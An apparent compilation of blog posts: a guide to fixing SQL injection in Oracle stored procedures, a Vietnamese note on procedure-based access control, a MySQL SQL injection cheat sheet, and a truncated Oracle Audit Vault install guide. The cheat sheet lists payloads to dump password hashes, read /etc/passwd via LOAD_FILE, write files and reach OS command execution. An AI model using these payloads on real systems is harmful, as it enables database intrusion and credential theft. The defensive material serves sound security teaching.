How To Fix SQL Injection In Oracle

How to Fix SQL Injection using Oracle Database Code

A stored procedure is a logical set of SQL statements, performing a specific task; it is compiled once and stored on a database server for all clients to execute; they are used very commonly for the many benefits that they provide. Often times, stored procedures are blindly considered secure; however, it is not so always. SQL Injection is a concern when dynamic SQL is handled incorrectly in a stored procedure.

In Oracle, dynamic SQL can be used in 1. EXECUTE IMMEDIATE statements, 2. DBMS_SQL package and 3. Cursors. This article illustrates how dynamic SQL can be built securely to defend against SQL injection attacks.

Execute Immediate Statement

Secure Usage
--Execute Immediate - named parameter
sqlStmt := 'SELECT emp_id FROM employees WHERE emp_email = :email';
EXECUTE IMMEDIATE sqlStmt USING email;

and

--Execute Immediate - positional parameter
sqlStmt := 'SELECT emp_id FROM employees WHERE emp_email = :1 and emp_name = :2';
EXECUTE IMMEDIATE sqlStmt USING email, name;
Vulnerable Usage
sqlStmt:= 'SELECT emp_id FROM employees WHERE emp_email = ''' || email || '''';
EXECUTE IMMEDIATE sqlStmt INTO empId;

Here, the input variable “email” is used directly in the query using concatenation; opening up the possibility to manipulate the “where” clause.

DBMS_SQL Package

Secure Usage
sqlStmt := 'SELECT emp_id FROM employees WHERE emp_email = :email';
empcur := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(empcur, sqlStmt, DBMS_SQL.NATIVE);
DBMS_SQL.BIND_VARIABLE(empcur, ':email', email);
DBMS_SQL.EXECUTE(empcur);

Here, bind variable is used to set data to query, hence sql injection proof.

Vulnerable Usage
sqlStmt := 'SELECT emp_id FROM employees WHERE emp_email = ''' || email || '''';
empcur:= DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(empcur, sqlStmt, DBMS_SQL.NATIVE);
DBMS_SQL.EXECUTE(empcur);

Here, the input variable “email” is used directly in the query using concatenation; opening up the possibility to manipulate the “where” clause.

Cursor with dynamic query

Secure Usage
sqlStmt := 'SELECT emp_id FROM employees WHERE emp_email = :email';
OPEN empcur FOR sqlStmt USING email;

Here, bind variable is used to set data to the query, hence sql injection proof.

Vulnerable Usage
sqlStmt := 'SELECT emp_id FROM employees WHERE emp_email = ''' || email || '''';
OPEN empcur FOR sqlStmt;

Here, the input variable “email” is used directly in the query using concatenation; opening up the possibility to manipulate the “where” clause.

——

Thanks Priya Gnanasundar!

Link: http://software-security.sans.org/developer-how-to/fix-sql-injection-in-oracle-database-code

Advertisements

Access Control Using Procedure on Oracle Database

  • User được tương tác với dữ liệu thông qua thực thi Procedure.
  • Có 2 dạng Procedure cần quan tâm:
    • Definer-rights Procedure (thực thi dưới quyền của User làm chủ Procedure): user chỉ cần được cấp quyền EXECUTE là có thể thực hiện được procedure mà không cần phải có quyền trên các đối tượng mà procedure tham chiếu tới.
    • Invoker-rights Procedure (thực hiện dưới quyền của user gọi thực thi nó): user thực thi cần phải được cấp quyền trên các đối tượng mà Procedure tham chiếu tới.

– Ví dụ:

Có 2 bảng SYS.USERS và DUC.USERS có các record như sau:

SYS.USERS

1

DUC.USERS

2

Trong đó user DUC không có quyền select trên table SYS.USERS. Bây giờ ta tạo 2 procedure bằng quyền SYS để xem sự khác biệt.

Definer-rights Procedure

3

Invoker-rights Procedure

4

Sau khi cấp quyền thực thi 2 procedure cho user DUC, ta kết nối database bằng user DUC và gọi thực thi 2 procedure này, chú ý xem kết quả trả về:

5

MySQL SQL Injection Cheat Sheet

Some useful syntax reminders for SQL Injection into MySQL databases…

 

This post is part of a series of SQL Injection Cheat Sheets.  In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend.  This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet.

The complete list of SQL Injection Cheat Sheets I’m working is:

I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here.

Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query.

Version SELECT @@version
Comments SELECT 1; #comment
SELECT /*comment*/1;
Current User SELECT user();
SELECT system_user();
List Users SELECT user FROM mysql.user; — priv
List Password Hashes SELECT host, user, password FROM mysql.user; — priv
Password Cracker John the Ripper will crack MySQL password hashes.
List Privileges SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privsSELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privsSELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns
List DBA Accounts SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; # priv
Current Database SELECT database()
List Databases SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db — priv
List Columns SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
List Tables SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
Find Tables From Column Name SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’; — find table which have a column called ‘username’
Select Nth Row SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0
Select Nth Char SELECT substr(‘abcd’, 3, 1); # returns c
Bitwise AND SELECT 6 & 2; # returns 2
SELECT 6 & 1; # returns 0
ASCII Value -> Char SELECT char(65); # returns A
Char -> ASCII Value SELECT ascii(‘A’); # returns 65
Casting SELECT cast(’1′ AS unsigned integer);
SELECT cast(’123′ AS char);
String Concatenation SELECT CONCAT(‘A’,’B’); #returns AB
SELECT CONCAT(‘A’,’B’,’C’); # returns ABC
If Statement SELECT if(1=1,’foo’,’bar’); — returns ‘foo’
Case Statement SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # returns A
Avoiding Quotes SELECT 0×414243; # returns ABC
Time Delay SELECT BENCHMARK(1000000,MD5(‘A’));
SELECT SLEEP(5); # >= 5.0.12
Make DNS Requests Impossible?
Command Execution If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar).  The .so file should contain a User Defined Function (UDF).  raptor_udf.c explains exactly how you go about this.  Remember to compile for the target architecture which may or may not be the same as your attack platform.
Local File Access …’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv, can only read world-readable files.
SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv, write to file system
Hostname, IP Address SELECT @@hostname;
Create Users CREATE USER test1 IDENTIFIED BY ‘pass1′; — priv
Delete Users DROP USER test1; — priv
Make User DBA GRANT ALL PRIVILEGES ON *.* TO test1@’%’; — priv
Location of DB files SELECT @@datadir;
Default/System Databases information_schema (>= mysql 5.0)
mysql

Oracle Audit Vault Installation – Step by Step

Phạm Bảo Nguyên's Blog

Oracle Audit Vault Installatio n

(Step by Step)

1. Audit Vault Server install:

$cd /source/avserver

$./runInstaller

2. Tạo user cho Audit vault server

$ sqlplus avmanager/manager-123

SQL> create user agentav identified by xxxx;

3. Add agent name vào Audit vault server

$ avca add_agent -agentname  agent_fcrac1 -agenthost  fcrac1 -agentusr agentav

AVCA started

Adding agent…

Agent added successfully.

4. Cài đặt Audit vault agent:

$cd  /source/avagent/hpux_ia64

$./runInstaller

5. Cấu hình Audit vault agent:

On Source Database (On Client):

$sqlplus / as sysdba

SQL> CREATE USER audituser IDENTIFIED BY xxxxx;

SQL> exit

$cd $AVAGENT_HOME/av/scripts/streams/source

$sqlplus / as sysdba

SQL>@zarsspriv.sql audituser SETUP

Granting privileges to AUDITUSER … Done.

SQL>@zarsspriv.sql audituser REDO_COLL

Granting privileges to AUDITUSER … Done.

SQL>exit

ON Audit Vault Server:

$ avorcldb add_source -src fcrac1-vip:1521:naprod -srcname fcrac1  -agentname  agent_fcrac1

$avorcldb add_collector -srcname fcrac1  -agentname agent_fcrac1 -colltype OSAUD -orclhome /u01/app/db

$avorcldb add_collector -srcname fcrac1  -agentname agent_fcrac1 -colltype DBAUD

On Source Database (On…

View original post 197 more words